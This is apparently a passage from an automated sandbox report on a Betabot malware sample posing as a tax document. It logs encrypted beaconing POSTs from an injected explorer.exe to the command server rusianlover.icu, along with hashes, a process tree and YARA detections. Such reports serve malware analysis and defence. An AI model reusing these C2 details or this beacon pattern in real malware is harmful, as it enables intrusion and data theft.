35 36 66 39 30 62 37 65 35 35 31 33 39 62 32 30 62 66 64 64 33 61 63 62 64 64 36 61 34 36 39 31 32 36 30 33 37 36 63 31 64 62 34 65 30 39 35 34 35 65 39 33 33 39 62 35 37 39 39 37 32 39 65 66 66 37 39 35 64 34 65 61 63 36 33 61 38 33 35 38 39 32 66 63 37 39 37 33 39 34 34 61 64 30 32 35 61 33 31 37 39 39 36 63 30 34 32 34 65 66 63 64 39 36 65 30 62 61 37 31 65 39 35 34 37 66 65 64 32 35 34 64 38 33 66 38 30 34 30 63 63 36 35 39 33 31 35 35 30 30 61 63 35 61 30 36 36 61 35 35 30 63 64 36 64 33 30 30 30 34 30 39 62 38 36 31 63 64 39 37 64 36 62 30 65 63 65 37 32 35 33 39 37 66 33 30 38 61 34 31 32 39 36 33 36 33 66 36 39 39 65 30 63 34 39 63 61 32 33 65 31 34 62 39 38 35 31 65 30 66 64 37 36 35 33 36 31 35 34 61 64 66 32 35 63 63 39 66 63 31 31 31 30 61 33 63 34 37 35 37 66 34 64 37 30 32 30 38 33 30 31 34 66 61 39 30 62 35 35 63 65 39 61 33 38 39 62 38 64 63 62 65 37 36 33 33 62 37 31 37 61 31 64 35 64 66 32 61 31 39 31 38 31 36 64 39 39 66 31 38 30 63 61 34 66 62 64 64 66 33 35 38 62 31 30 66 39 36 34 37 63 37 37 63 62 65 38 33 31 30 62 64 34 61 30 32 65 31 39 30 63 32 35 62 36 64 36 62 61 66 38 30 38 36 63 66 32 34 65 66 39 66 39 36 66 34 35 31 39 32 66 36 65 63 35 30 31 31 32 34 38 35 30 33 64 38 61 32 61 32 61 30 35 30
                                        Data Ascii: mykwoa=db7bc2b8eb1d9d5d939debe534517d4ae6486c7f4a451d259045c298442162aa83a7f60c4e2d4e&kueo=60847362&ocqeymao=04ad5d2b8df48d93e98cdd82ce3584db0eaad889cef4ab3179622627842cb11e572e3c0f07c89e06bcd150c425aed9a9d5c62b256e9740234b80da502a1e46e0de4c5d40c261985255d9399ebf5968cc54d9b0575e56f90b7e55139b20bfdd3acbdd6a4691260376c1db4e09545e9339b5799729eff795d4eac63a835892fc7973944ad025a317996c0424efcd96e0ba71e9547fed254d83f8040cc659315500ac5a066a550cd6d3000409b861cd97d6b0ece725397f308a41296363f699e0c49ca23e14b9851e0fd76536154adf25cc9fc1110a3c4757f4d702083014fa90b55ce9a389b8dcbe7633b717a1d5df2a191816d99f180ca4fbddf358b10f9647c77cbe8310bd4a02e190c25b6d6baf8086cf24ef9f96f45192f6ec5011248503d8a2a2a050
                                        Mar 10, 2021 11:42:39.561311007 CET1963INHTTP/1.1 200 OK
                                        Server: nginx/1.10.3
                                        Date: Wed, 10 Mar 2021 10:42:45 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Vary: Accept-Encoding
                                        Data Raw: 36 64 0d 0a cc 5d 85 0b 05 18 23 2f ea e7 63 88 53 b8 05 b7 80 ef 94 08 27 65 61 4e ca f6 85 54 9d 1c 57 86 c6 89 0a 00 b8 d0 4d 35 26 e1 bc 33 d1 39 11 72 3d 57 4b 61 16 ed aa c6 1f 9d da 11 d7 16 70 52 82 9a c5 be a6 2c 08 ea 71 38 bb fe 50 37 32 32 bc 86 6d f1 cd 83 0a 1a 60 37 de b8 45 d3 6b f3 c3 85 18 68 db 5b 1f 7f 61 7e 8d 67 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6d]#/cS'eaNTWM5&39r=WKapR,q8P722m`7Ekh[a~g0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        6192.168.2.549724212.114.52.4380C:\Windows\SysWOW64\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Mar 10, 2021 11:42:42.321046114 CET1979OUTPOST /forum/logout.php?id=1809723 HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: rusianlover.icu
                                        Content-Length: 664
                                        Cache-Control: no-cache
                                        Data Raw: 78 75 72 6f 6c 3d 32 31 36 30 36 31 32 37 26 7a 79 78 77 76 75 74 3d 37 30 42 34 32 32 31 39 31 43 31 38 45 43 42 32 46 37 43 38 38 45 30 43 34 44 46 36 42 30 43 42 39 45 35 37 38 34 30 41 35 36 32 45 34 43 26 62 63 64 65 66 67 68 69 6a 3d 41 35 45 38 34 38 44 38 42 41 45 43 46 37 34 32 36 37 36 45 35 34 44 35 44 36 39 37 46 41 36 43 46 34 37 42 41 37 42 31 38 41 38 35 43 45 35 37 32 32 45 42 43 32 41 31 35 41 31 45 36 43 30 45 44 31 39 39 37 33 46 39 30 39 37 38 39 44 32 31 36 32 35 35 43 45 33 42 30 30 42 46 41 43 33 43 45 46 46 36 35 30 46 39 44 34 38 42 45 46 43 36 30 42 43 45 44 33 35 35 34 44 32 36 39 43 42 46 31 41 33 36 36 32 36 33 34 30 37 42 44 34 41 31 31 41 42 35 31 37 30 33 43 45 42 46 35 31 42 46 42 46 45 36 37 42 42 42 42 36 46 39 31 38 44 42 39 46 45 31 44 39 34 35 39 35 31 42 35 44 45 35 32 39 33 46 38 31 36 37 32 36 41 31 42 32 36 39 46 31 43 38 41 44 30 41 43 41 42 35 34 34 43 45 44 34 35 36 43 31 41 37 36 42 34 46 31 46 44 39 46 38 46 43 44 31 41 45 45 38 41 38 36 34 43 37 36 36 31 36 30 42 37 43 43 46 39 30 44 38 41 33 32 36 38 30 31 39 39 31 42 44 33 46 30 38 46 30 34 37 31 32 41 31 43 30 46 33 37 33 34 33 34 32 42 32 43 36 31 37 44 35 37 33 41 44 41 31 35 42 46 31 42 34 30 45 45 38 45 38 30 44 32 42 34 41 32 44 41 38 39 38 46 41 42 36 35 41 44 43 39 41 41 36 38 41 39 34 41 39 32 31 33 41 32 46 43 45 36 35 46 36 39 37 37 45 42 33 38 41 41 45 41 34 30 30 45 36 34 36 30 35 38 41 39 44 39 37 39 34 30 45 34 32 46 39 43 30 32 44 35 45 30 38 33 35 44 46 46 46 37 34 38 38 39 42 34 37 36 43 43 34 36 45 34 45 33 36 31 38 45 37 30 38 37 45 38 35 44 44 39 39 44 33 36 31 46 39 45 34 39 34 42 46 30 38 42 31 39 42 38 36 32 42 42 46 45 41 43 42 45 45 45 37 41 38 45 36 41 43 36 30 34 39 30 35 31 39 45 34 33 30 31 38 30 31 33 31 30 43 42 33 31 33 43 32 36 42 36 46 33 36 46 38 31 37 44 35 34 30 46 41 32 35 36 34 37 35 31 46 30 45 33 44 46 43 32 46 35 39 45 44 31 38 35 37 43 45 46 38 45 32 44 32 44 42 36 46 43 39 44 41 46 43 36 46 31 32 31 35 31 42 30 36
                                        Data Ascii: xurol=21606127&zyxwvut=70B422191C18ECB2F7C88E0C4DF6B0CB9E57840A562E4C&bcdefghij=A5E848D8BAECF742676E54D5D697FA6CF47BA7B18A85CE5722EBC2A15A1E6C0ED19973F909789D216255CE3B00BFAC3CEFF650F9D48BEFC60BCED3554D269CBF1A366263407BD4A11AB51703CEBF51BFBFE67BBBB6F918DB9FE1D945951B5DE5293F816726A1B269F1C8AD0ACAB544CED456C1A76B4F1FD9F8FCD1AEE8A864C766160B7CCF90D8A326801991BD3F08F04712A1C0F3734342B2C617D573ADA15BF1B40EE8E80D2B4A2DA898FAB65ADC9AA68A94A9213A2FCE65F6977EB38AAEA400E646058A9D97940E42F9C02D5E0835DFFF74889B476CC46E4E3618E7087E85DD99D361F9E494BF08B19B862BBFEACBEEE7A8E6AC60490519E4301801310CB313C26B6F36F817D540FA2564751F0E3DFC2F59ED1857CEF8E2D2DB6FC9DAFC6F12151B06
                                        Mar 10, 2021 11:42:42.394654989 CET1984INHTTP/1.1 200 OK
                                        Server: nginx/1.10.3
                                        Date: Wed, 10 Mar 2021 10:42:48 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Vary: Accept-Encoding
                                        Data Raw: 36 64 0d 0a 65 e2 3a 18 f0 0c 2d 1a 4c a9 a2 55 9f de 29 49 0b 7f 41 0f 23 8a 00 53 ce cd e5 ad 8e e3 f9 6b 97 04 22 ed 8f 19 69 97 66 5d 5f 2f ff 52 fc f7 aa bb 38 c0 af f9 3d d2 1a de 86 a8 37 eb d3 4c 2a 89 a3 94 97 26 bd 2e bd 35 5f 09 6c 7a 93 4d 81 8a 3e 54 da bb 94 e0 a6 f1 3b 8d c4 9d 12 1d 13 23 53 b0 92 fb 08 39 d0 9e 4d 9a 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6de:-LU)IA#Sk"if]_/R8=7L*&.5_lzM>T;#S9M0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        7192.168.2.549726212.114.52.4380C:\Windows\SysWOW64\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Mar 10, 2021 11:42:45.201111078 CET2030OUTPOST /forum/logout.php?page=83 HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: rusianlover.icu
                                        Content-Length: 644
                                        Cache-Control: no-cache
                                        Data Raw: 76 77 78 79 74 75 76 77 72 3d 36 39 31 36 36 35 37 31 26 78 61 64 67 64 3d 36 64 36 37 64 32 36 36 33 37 34 35 61 32 63 63 32 37 32 64 31 35 65 65 31 38 26 7a 65 6a 6f 6e 73 78 3d 32 46 31 30 30 35 38 32 35 39 34 32 34 42 32 34 39 39 35 33 42 39 32 41 32 45 38 31 32 33 34 41 43 33 45 33 41 35 33 35 42 37 32 42 39 44 46 43 39 32 39 45 42 44 38 33 43 45 46 38 36 44 34 39 32 31 38 36 45 45 41 44 41 41 34 36 33 43 31 46 31 37 36 32 37 46 39 32 34 35 37 42 31 42 43 34 34 46 42 45 33 44 30 30 43 33 41 41 30 30 42 31 46 42 44 41 39 35 44 46 34 31 35 39 38 41 46 32 33 39 38 46 42 43 37 45 42 32 36 33 42 33 39 43 32 39 34 38 37 43 34 45 30 46 43 31 34 33 32 44 34 34 44 45 45 43 37 34 30 43 36 39 32 33 46 46 36 45 41 44 33 44 34 30 44 39 31 44 43 35 38 43 36 38 44 31 36 42 42 43 36 46 32 36 36 42 37 39 43 43 43 32 35 31 45 37 43 41 35 42 30 43 39 38 33 34 34 30 43 31 31 34 32 33 30 33 32 43 46 34 33 36 42 46 38 38 37 35 32 38 37 33 30 46 46 32 31 41 42 37 45 39 32 38 43 43 42 34 38 44 46 45 32 46 41 33 45 42 36 34 34 33 37 34 36 30 38 32 45 35 39 35 31 33 42 32 34 43 42 43 33 30 43 32 41 32 46 33 30 31 44 36 46 31 32 32 44 41 32 41 30 39 41 38 34 35 33 36 30 30 36 36 42 33 41 39 32 34 32 34 42 33 34 33 39 34 36 46 44 38 46 44 42 36 46 35 37 30 31 35 44 31 42 32 35 38 46 43 41 44 39 37 36 33 42 46 36 34 39 38 33 35 35 33 32 34 35 45 36 31 35 41 43 31 32 33 38 38 31 30 30 44 46 43 45 39 33 38 44 34 38 31 32 46 42 31 45 34 39 42 31 36 46 43 34 44 43 34 41 41 46 43 46 34 34 37 46 39 43 42 35 38 36 30 42 42 41 46 43 38 35 42 32 32 41 32 43 30 32 36 43 31 31 41 38 30 36 34 43 32 42 32 32 32 38 45 30 34 34 45 36 37 41 31 30 39 45 31 41 37 30 37 39 39 35 45 36 38 38 36 41 44 38 39 36 31 38 43 39 34 36 32 30 42 39 39 35 34 30 43 43 34 31 41 32 37 44 42 41 45 32 30 44 42 43 38 33 34 37 36 34 36 36 42 45 30 42 32 44 32 46 30 31 39 34 33 30 46 34 31 46 42 31 45 41 36 46 33 33 35 43 38 46 32 39 30 44 37 45 43 39 36 39 45
                                        Data Ascii: vwxytuvwr=69166571&xadgd=6d67d2663745a2cc272d15ee18&zejonsx=2F10058259424B249953B92A2E81234AC3E3A535B72B9DFC929EBD83CEF86D492186EEADAA463C1F17627F92457B1BC44FBE3D00C3AA00B1FBDA95DF41598AF2398FBC7EB263B39C29487C4E0FC1432D44DEEC740C6923FF6EAD3D40D91DC58C68D16BBC6F266B79CCC251E7CA5B0C983440C11423032CF436BF887528730FF21AB7E928CCB48DFE2FA3EB6443746082E59513B24CBC30C2A2F301D6F122DA2A09A845360066B3A92424B343946FD8FDB6F57015D1B258FCAD9763BF64983553245E615AC12388100DFCE938D4812FB1E49B16FC4DC4AAFCF447F9CB5860BBAFC85B22A2C026C11A8064C2B2228E044E67A109E1A707995E6886AD89618C94620B99540CC41A27DBAE20DBC83476466BE0B2D2F019430F41FB1EA6F335C8F290D7EC969E
                                        Mar 10, 2021 11:42:45.268615007 CET2031INHTTP/1.1 200 OK
                                        Server: nginx/1.10.3
                                        Date: Wed, 10 Mar 2021 10:42:51 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Vary: Accept-Encoding
                                        Data Raw: 36 64 0d 0a d5 0f 50 08 03 5f 9f 74 c4 dc c5 c4 02 57 c8 58 92 b7 0b 10 ca d0 53 95 46 22 4d 3f 49 34 ae 20 07 93 a2 a3 f3 6c d9 00 92 d8 38 b3 bb 24 bb 70 29 df 31 6e 4b 0c 14 50 1f 15 60 52 82 1b 9f b5 4c 9e 76 17 b2 72 60 f5 8d 14 72 12 92 3e 78 18 90 b4 3f e8 cc f6 7a f9 57 3b 05 30 58 36 1d 44 10 0d e8 2c a6 e7 88 57 f1 fc 75 93 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6dP_tWXSF"M?I4 l8$p)1nKP`RLvr`r>x?zW;0X6D,Wu0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        8192.168.2.549727212.114.52.4380C:\Windows\SysWOW64\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Mar 10, 2021 11:42:48.520873070 CET2033OUTPOST /forum/logout.php?id=2140088 HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: rusianlover.icu
                                        Content-Length: 679
                                        Cache-Control: no-cache
                                        Data Raw: 6f 69 63 77 71 6b 3d 32 39 34 33 35 31 36 32 26 71 6d 69 65 61 77 73 69 3d 35 33 65 39 36 35 66 38 32 33 38 36 66 64 34 38 66 38 30 35 35 33 63 31 65 31 30 66 36 64 38 65 31 35 37 37 65 36 31 32 30 64 36 39 31 35 61 32 31 39 36 66 63 31 66 32 38 66 32 61 33 38 38 64 26 73 71 6f 6d 3d 41 44 41 32 46 44 34 36 34 38 43 43 36 36 46 37 33 36 45 45 42 42 42 42 33 35 30 35 32 31 36 39 31 31 34 31 43 37 43 39 44 44 35 38 46 38 44 30 31 42 43 39 37 32 30 46 33 37 46 30 30 44 42 30 41 39 42 30 44 38 37 41 36 45 44 38 46 41 37 44 39 30 39 41 35 31 39 34 41 31 36 33 32 33 31 42 33 35 46 35 43 41 46 31 37 35 30 45 31 31 36 41 41 39 42 43 44 32 35 37 36 41 31 34 42 39 32 36 44 32 46 46 36 36 44 42 35 35 38 44 30 41 36 39 33 43 43 35 39 39 30 42 35 41 39 36 32 32 34 45 46 31 34 43 42 39 38 31 33 37 31 30 38 37 30 39 33 33 42 30 38 33 43 44 42 39 32 46 30 32 43 39 44 41 35 43 34 32 42 32 43 46 39 45 30 39 44 33 36 35 34 42 43 35 44 41 42 39 41 34 32 37 41 37 36 35 44 45 43 46 45 42 33 39 42 33 41 34 37 31 45 42 32 38 37 38 30 34 33 33 38 31 31 33 31 36 43 32 34 46 44 42 35 34 42 32 46 38 38 46 45 35 33 31 33 42 35 45 41 30 37 36 45 35 44 41 44 41 38 38 39 33 39 31 45 35 46 34 35 31 30 35 37 45 43 44 38 33 38 31 38 32 39 46 34 41 35 45 35 33 38 39 32 45 30 35 38 37 37 46 32 31 32 37 41 36 32 33 46 43 38 42 45 38 30 43 34 41 43 37 35 45 35 32 33 36 38 42 42 44 31 30 41 34 31 35 31 34 37 42 36 35 38 35 31 41 38 43 38 30 33 42 34 35 41 43 37 30 31 32 34 42 32 32 39 37 32 34 35 35 43 37 38 43 34 36 44 43 45 32 31 34 39 39 33 31 31 46 45 44 38 45 36 38 33 31 35 33 42 44 41 33 38 34 30 41 44 41 44 46 33 38 33 39 34 45 42 35 37 32 36 33 37 36 46 38 45 30 33 46 30 32 46 38 36 43 35 38 46 36 35 39 33 39 31 46 43 39 31 34 39 44 39 38 41 34 38 41 33 42 31 38 43 35 39 32 45 36 44 46 44 36 42 36 38 45 43 38 36 35 36 37 34 46 45 44 38 31 46 32 39 41 36 34 37 46 38 33 43 30 36 34 42 42 34 33 34 44 37 31 32 42 35 32 33 34 33 34 42 36 32 35 39 46 34 46 45 36 35 36 41 30 44 37 33 30 30 45 36 30 37 39 41 31 36 45 36 35 38 32 39 43 46 37
                                        Data Ascii: oicwqk=29435162&qmieawsi=53e965f82386fd48f80553c1e10f6d8e1577e6120d6915a2196fc1f28f2a388d&sqom=ADA2FD4648CC66F736EEBBBB350521691141C7C9DD58F8D01BC9720F37F00DB0A9B0D87A6ED8FA7D909A5194A163231B35F5CAF1750E116AA9BCD2576A14B926D2FF66DB558D0A693CC5990B5A96224EF14CB9813710870933B083CDB92F02C9DA5C42B2CF9E09D3654BC5DAB9A427A765DECFEB39B3A471EB28780433811316C24FDB54B2F88FE5313B5EA076E5DADA889391E5F451057ECD8381829F4A5E53892E05877F2127A623FC8BE80C4AC75E52368BBD10A415147B65851A8C803B45AC70124B22972455C78C46DCE21499311FED8E683153BDA3840ADADF38394EB5726376F8E03F02F86C58F659391FC9149D98A48A3B18C592E6DFD6B68EC865674FED81F29A647F83C064BB434D712B523434B6259F4FE656A0D7300E6079A16E65829CF7
                                        Mar 10, 2021 11:42:48.590410948 CET2034INHTTP/1.1 200 OK
                                        Server: nginx/1.10.3
                                        Date: Wed, 10 Mar 2021 10:42:54 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Vary: Accept-Encoding
                                        Data Raw: 36 64 0d 0a a9 fc 0a 4b 53 bf 7c 5e c3 87 90 35 01 6c 1f cf 75 98 cb 07 8e b2 cc 74 a8 97 82 9e 6f 7a e0 c9 8c c3 80 d5 ca 8e 0b f3 eb 9c bd a7 c1 81 9d 27 32 98 48 f0 fa 04 f0 67 b3 c8 2d 62 af 22 ff 86 be 93 f6 f4 fc 6d 17 51 e5 01 24 08 85 a8 5c e2 fb cc 2d 6b f6 33 a7 7b 7e 47 a6 77 2d 64 53 75 d6 89 ce c9 31 74 a6 99 ac d2 9c c5 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6dKS|^5lutoz'2Hg-b"mQ$\-k3{~Gw-dSu1t0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        9192.168.2.549729212.114.52.4380C:\Windows\SysWOW64\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Mar 10, 2021 11:42:51.355341911 CET2038OUTPOST /forum/logout.php?id=9885598 HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: rusianlover.icu
                                        Content-Length: 646
                                        Cache-Control: no-cache
                                        Data Raw: 7a 65 6a 6f 74 3d 35 39 39 37 35 34 38 35 26 62 69 70 77 64 6b 72 3d 43 45 33 42 36 34 37 42 32 45 41 35 41 36 31 43 31 31 37 31 46 30 32 44 39 37 34 32 26 64 6d 76 65 6e 77 66 6f 78 3d 35 46 33 30 41 46 45 41 30 39 43 44 38 33 42 38 43 32 44 35 34 38 45 30 35 38 31 39 46 45 43 44 33 37 41 34 33 30 38 43 43 36 42 30 43 34 42 39 36 44 45 32 31 38 30 45 38 35 34 32 45 45 35 31 43 30 39 46 46 32 37 44 45 46 37 30 36 32 45 34 43 44 30 37 43 36 33 45 45 33 46 37 39 35 46 38 37 37 33 42 35 35 37 41 45 42 38 39 46 33 46 46 41 38 44 36 37 44 31 42 46 43 36 32 36 37 33 44 30 33 37 39 46 36 42 37 38 34 34 33 43 35 41 31 46 46 30 44 30 34 37 36 35 34 36 43 41 35 30 37 46 33 43 41 44 37 36 33 35 46 45 35 37 43 41 35 43 45 39 37 38 46 42 41 30 37 36 30 45 37 45 38 42 41 42 36 32 43 35 39 42 32 37 45 33 44 36 45 37 41 36 38 42 41 39 45 38 34 37 42 35 42 32 30 42 37 43 41 44 36 37 45 39 41 35 43 44 45 35 45 37 37 35 43 45 39 35 45 34 39 46 46 36 39 31 35 36 30 46 31 38 38 46 44 30 35 45 32 35 42 44 42 35 39 37 32 33 41 36 35 34 41 33 32 30 44 41 39 42 39 37 41 42 30 44 34 43 35 35 45 36 43 32 34 31 38 33 42 41 36 33 36 36 45 44 42 39 30 44 46 41 38 39 41 31 45 32 44 37 35 32 33 30 36 38 46 30 32 41 32 46 37 37 42 31 43 33 35 39 45 31 33 37 32 34 36 42 41 30 36 35 32 34 46 46 37 46 34 44 44 39 36 44 32 45 44 43 41 33 43 37 32 30 43 41 37 43 32 32 46 30 46 34 44 46 33 45 35 44 37 35 32 37 45 44 30 34 41 39 33 33 31 42 44 44 34 31 44 31 36 30 45 39 36 45 32 33 44 35 34 45 46 37 32 43 36 43 46 38 44 38 33 37 45 32 43 31 46 30 44 33 32 35 36 42 30 35 41 45 31 45 41 34 32 42 37 44 44 30 46 34 34 38 30 41 36 41 38 42 46 41 32 36 39 31 43 33 44 31 38 44 38 34 36 31 46 32 36 38 33 37 31 32 46 45 35 42 37 46 32 32 36 37 35 45 38 38 43 45 30 33 34 36 43 41 35 42 31 36 34 37 35 38 34 35 36 35 43 44 33 34 33 42 32 35 45 30 44 38 31 41 45 46 33 34 34 42 31 31 43 43 32 43 44 43 35 42 42 32 32 43 42 41 31 42 41 38 35 36 44 35 37 32 35
                                        Data Ascii: zejot=59975485&bipwdkr=CE3B647B2EA5A61C1171F02D9742&dmvenwfox=5F30AFEA09CD83B8C2D548E05819FECD37A4308CC6B0C4B96DE2180E8542EE51C09FF27DEF7062E4CD07C63EE3F795F8773B557AEB89F3FFA8D67D1BFC62673D0379F6B78443C5A1FF0D0476546CA507F3CAD7635FE57CA5CE978FBA0760E7E8BAB62C59B27E3D6E7A68BA9E847B5B20B7CAD67E9A5CDE5E775CE95E49FF691560F188FD05E25BDB59723A654A320DA9B97AB0D4C55E6C24183BA6366EDB90DFA89A1E2D7523068F02A2F77B1C359E137246BA06524FF7F4DD96D2EDCA3C720CA7C22F0F4DF3E5D7527ED04A9331BDD41D160E96E23D54EF72C6CF8D837E2C1F0D3256B05AE1EA42B7DD0F4480A6A8BFA2691C3D18D8461F2683712FE5B7F22675E88CE0346CA5B1647584565CD343B25E0D81AEF344B11CC2CDC5BB22CBA1BA856D5725
                                        Mar 10, 2021 11:42:51.430608988 CET2038INHTTP/1.1 200 OK
                                        Server: nginx/1.10.3
                                        Date: Wed, 10 Mar 2021 10:42:57 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Vary: Accept-Encoding
                                        Data Raw: 36 64 0d 0a ac b5 76 0c 34 8b 53 0d 54 c7 ed 43 1d 60 73 31 4a f2 96 29 da e3 b9 b8 cb be 0c 0c 9d cc 17 bb dd 34 22 5b e6 a2 b7 b5 d5 fc f4 b9 b0 66 24 71 3b a9 b4 05 1d a2 0e d3 c9 65 83 76 07 62 0d 7a a1 11 e8 7c 95 47 38 25 75 b4 54 c4 26 6d a2 a5 0f 37 1f e9 3e 69 2e 62 43 14 84 4d 2b 1a 6a d9 50 c9 0f 7e 50 37 c5 42 3a 92 83 43 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6dv4STC`s1J)4"[f$q;evbz|G8%uT&m7>i.bCM+jP~P7B:C0


                                        HTTPS Packets

                                        TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                        Mar 10, 2021 11:42:29.744301081 CET104.21.55.228443192.168.2.549717CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IETue Jul 28 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020Wed Jul 28 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-24-65281,29-23-24,057f3642b4e37e28f5cbe3020c9331b4c
                                        CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025

                                        Code Manipulations

                                        Statistics

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        Analysis Process: Documento--SII--33875.exe PID: 5464 Parent PID: 5712

                                        General

                                        Start time:11:41:51
                                        Start date:10/03/2021
                                        Path:C:\Users\user\Desktop\Documento--SII--33875.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\Desktop\Documento--SII--33875.exe'
                                        Imagebase:0x400000
                                        File size:852996 bytes
                                        MD5 hash:2CED2C14EECE71C72C5E45E8A607BB4C
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Show Windows behavior

                                        File Activities

                                        Analysis Process: Documento--SII--33875.exe PID: 4948 Parent PID: 5464

                                        General

                                        Start time:11:41:52
                                        Start date:10/03/2021
                                        Path:C:\Users\user\Desktop\Documento--SII--33875.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\Desktop\Documento--SII--33875.exe'
                                        Imagebase:0x400000
                                        File size:852996 bytes
                                        MD5 hash:2CED2C14EECE71C72C5E45E8A607BB4C
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000002.00000002.236019487.00000000022A0000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:low
                                        Show Windows behavior

                                        File Activities

                                        Show Windows behavior

                                        Registry Activities

                                        Analysis Process: explorer.exe PID: 3696 Parent PID: 4948

                                        General

                                        Start time:11:41:54
                                        Start date:10/03/2021
                                        Path:C:\Windows\SysWOW64\explorer.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\explorer.exe
                                        Imagebase:0xe0000
                                        File size:3611360 bytes
                                        MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000003.00000002.519183490.0000000002A00000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:high
                                        Show Windows behavior

                                        File Activities

                                        Show Windows behavior

                                        Registry Activities

                                        Analysis Process: CpSHySoEfzH.exe PID: 2244 Parent PID: 3696

                                        General

                                        Start time:11:41:58
                                        Start date:10/03/2021
                                        Path:C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe
                                        Wow64 process (32bit):true
                                        Commandline:
                                        Imagebase:0x11c0000
                                        File size:909312 bytes
                                        MD5 hash:77276DDC82248473D033E2494C438A97
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000005.00000002.551764489.0000000004650000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:moderate
                                        Show Windows behavior

                                        File Activities

                                        Show Windows behavior

                                        Registry Activities

                                        Analysis Process: CpSHySoEfzH.exe PID: 240 Parent PID: 3696

                                        General

                                        Start time:11:42:00
                                        Start date:10/03/2021
                                        Path:C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe
                                        Wow64 process (32bit):true
                                        Commandline:
                                        Imagebase:0x11c0000
                                        File size:909312 bytes
                                        MD5 hash:77276DDC82248473D033E2494C438A97
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000007.00000002.545447794.0000000003B70000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:moderate
                                        Show Windows behavior

                                        File Activities

                                        Show Windows behavior

                                        Registry Activities

                                        Analysis Process: CpSHySoEfzH.exe PID: 4644 Parent PID: 3696

                                        General

                                        Start time:11:42:01
                                        Start date:10/03/2021
                                        Path:C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe
                                        Wow64 process (32bit):true
                                        Commandline:
                                        Imagebase:0x7ff797770000
                                        File size:909312 bytes
                                        MD5 hash:77276DDC82248473D033E2494C438A97
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
